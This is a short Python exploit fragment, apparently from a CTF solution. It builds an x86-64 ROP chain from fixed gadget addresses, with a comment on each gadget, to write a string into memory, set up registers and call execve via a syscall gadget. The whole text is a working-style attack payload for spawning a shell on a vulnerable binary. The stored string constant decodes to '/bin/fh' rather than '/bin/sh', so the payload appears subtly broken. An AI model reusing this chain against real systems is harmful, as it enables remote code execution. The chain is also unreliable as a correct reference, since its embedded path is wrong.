payload = p64(0x49556b)
#0x000000000049556b: pop rax; ret 0; 
payload += p64(0x4a0070)+p64(0x42cd73)
# 0x000000000042cd73: xchg eax, edx; nop dword ptr [rax]; ret; 
payload += p64(0x49556b)
# 0x000000000049556b: pop rax; ret 0; 
payload += p64(0x68662f6e69622f)+p64(0x4111d7)
# 0x00000000004111d7: mov qword ptr [rdx], rax; ret; 
payload += p64(0x4098f0)
# 0x00000000004098f0: pop rsi; ret; 
payload += p64(0x0)+p64(0x49556b)
# 0x000000000049556b: pop rax; ret 0; 
payload += p64(0x4a0182)+p64(0x4683f0)
# 0x00000000004683f0: mov edx, esi; mov byte ptr [rax], dl; mov eax, 0; pop rbp; ret; 
payload += p64(0x0)+p64(0x4098f0)
# 0x00000000004098f0: pop rsi; ret; 
payload += p64(0x4a01bf)+p64(0x43d7b6)
# 0x000000000043d7b6: pop rdi; adc byte ptr [rsi - 0x3f], ah; ret; 
payload += p64(0x4a0070)+p64(0x49556b)
# 0x000000000049556b: pop rax; ret 0; 
payload += p64(0x3b)+p64(0x4098f0)
# 0x00000000004098f0: pop rsi; ret; 
payload += p64(0x0)+p64(0x41d0a2)
# 0x000000000041d0a2: syscall; 
payload += b''
